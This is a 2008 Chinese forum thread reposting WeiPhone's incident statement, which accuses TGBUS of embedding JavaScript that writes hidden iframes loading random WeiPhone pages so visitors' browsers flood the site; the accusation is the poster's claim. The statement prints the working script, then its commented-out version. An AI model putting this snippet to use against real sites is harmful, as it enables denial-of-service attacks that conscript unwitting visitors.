论坛 › 灌水专区 › WeiPhone 受到TGBUS无耻的攻击的情况说明

月神侠 发表于 2008-1-5 00:26:57

WeiPhone 受到TGBUS无耻的攻击的情况说明

原帖：http://www.weiphone.com/thread-50040-1-1.html


WeiPhone 受到无耻的攻击的情况说明!!!                                                                                                                                                                                                                                             从1月3日从晚上7:00多起。大家就不停看到：

The server can't process your request due to a high load, please try again later
服务器不能处理你请求这是一个高的负荷,请稍后再次尝试。

在我们一断的排查之后发现,今天 有非常多来自ＴＧＢＵＳ网的访问,通我们查询情况如下：

因为事情出现的很突然，我们联系了本站服务器管理员进行故障处理恢复，并且开始调查原因。我们通过统计工具发现在最近一段时间内，来自TGBUS的访问量极大幅的增加。通过对该网站进一步的查询我们发现，在该网站如下地址的页面中http://inc.tgbus.com/import/desktop_article.html?key=http://nds.tgbus.com/ndsgl/200712/20071203191929_2.shtml
存在以下JavaScript代码：</script>
<script>
var id = Math.floor(Math.random()*49924);
document.write("<iframe src=\"http://www.weiphone.com/thread-" + id+ "-1-1.html\" style=\"display: none\" ></iframe>");
id = Math.floor(Math.random()*400);
document.write("<iframe src=\"http://www.weiphone.com/forum-5-" + id+ ".html\" style=\"display: none\" ></iframe>");
</script>
初步分析有可能是因此导致论坛访问量突增导致的服务器无法负载处理。

正当我们打算做进一步分析调查以详细确认问题出现原因的过程中，忽然我们发现该页面的该段代码变为:</script>
<script>
var id = Math.floor(Math.random()*49924);
//document.write("<iframe src=\"http://www.weiphone.com/thread-" +id + "-1-1.html\" style=\"display: none\" ></iframe>");
id = Math.floor(Math.random()*400);
//document.write("<iframe src=\"http://www.weiphone.com/forum-5-" +id + ".html\" style=\"display: none\" ></iframe>");
</script>
两段重要的程序代码前面都添加了程序注释符号“//”，而此时本站的访问量突增问题突然也随之消失，网站的访问以及打开页面也都恢复了正常。

事情到此为止，如果对于编程或者JS代码以及HTML代码有了解的人都应该能大概读懂一上代码的执行结果以及更改前后带来的结果有何区别。

更为严重的是我们发现不仅仅是以上一个链接地址的页面被加入该段代码，而是整个http://inc.tgbus.com/ 的连接地址代码全部都被内嵌了该段javascript代码。

其作用是：让访问TGBUS的网民.在不知情的情况下. 随机生成ID号。 用网民访问在页内人海式攻击WeiPhone,几何倍增长。这样的形成大量的非正常请求造成的拒绝服务攻击 . 让服务器崩溃。


对这些不怀好意的人的令人发指的作法。来利用善良的网民,喜欢iPhone的和喜欢我们站点的朋友来攻击我们的服务器,已达到其不可告人的卑鄙目的!!!

但是,我们和朋友们的眼睛是雪亮的!我们及时的发现了这种卑鄙的手段,并且已经采取了通过网络治安部门的介入来调查此事的真相!相信不怀好意的人是不会有好的下场的!

给坛友和朋友们一个现在的事实真相。请大家继续关注此事的发展,我们会有一个结论,也必须有一个结果给我们的朋友们和论坛！


http://attachments.cngba.com/attachments/month_0801/20080104_fb5fe20a8e2d3f9029c8vifCxTONYQjH.jpg


http://attachments.cngba.com/attachments/month_0801/20080104_73f1785038526ab86553BoW8zDwDzmCw.jpg


http://attachments.cngba.com/attachments/month_0801/20080104_1c42afd3cbc59f828325j7jnmwqxIX2M.jpg


http://attachments.cngba.com/attachments/month_0801/20080104_5f1ff36db9015b21c5fbYxxIMG8C8TTf.jpg

视频公布:

http://you.video.sina.com.cn/m/1346809995

ｗｅｉ 发表于 2008-1-5 00:38:13

等着看网络治安部门怎么处理= =

飘渺游仙 发表于 2008-1-5 00:58:33

WEIPHONE是干嘛的?

ivan1979 发表于 2008-1-5 08:02:14

原帖由 飘渺游仙 于 2008-1-5 00:58 发表 http://bbs.newwise.com/images/common/back.gif
WEIPHONE是干嘛的?
同问＋1，其实偶在爽表情～

babywong4号 发表于 2008-1-5 08:05:09

原帖由 飘渺游仙 于 2008-1-5 00:58 发表 http://bbs.newwise.com/images/common/back.gif
WEIPHONE是干嘛的?

同问，本人寡闻只听过ＩＰＨＯＮＥ．

風駿 发表于 2008-1-5 08:07:06

巴士这又不是第一次

f107 发表于 2008-1-5 08:49:49

聽都沒聽過的站名，黑它干啥啊？

monitorliu 发表于 2008-1-5 13:23:49

估计是看这个网站比较有前途吧。
将它扼杀在摇篮里面。

長門王道 发表于 2008-1-5 13:40:25

无耻呀= =

sonci 发表于 2008-1-5 14:58:23

手捧爆米花继续观望

pow61 发表于 2008-1-5 16:32:38

渣站就是这样

月枫 发表于 2008-1-5 16:51:20

真的，我都不知道该怎么说踢JB死了

呆鸟 发表于 2008-1-5 18:04:21

全球通那小子干的？

甄命天子 发表于 2008-1-5 21:29:52

便TJJTDS……

查看完整版本: WeiPhone 受到TGBUS无耻的攻击的情况说明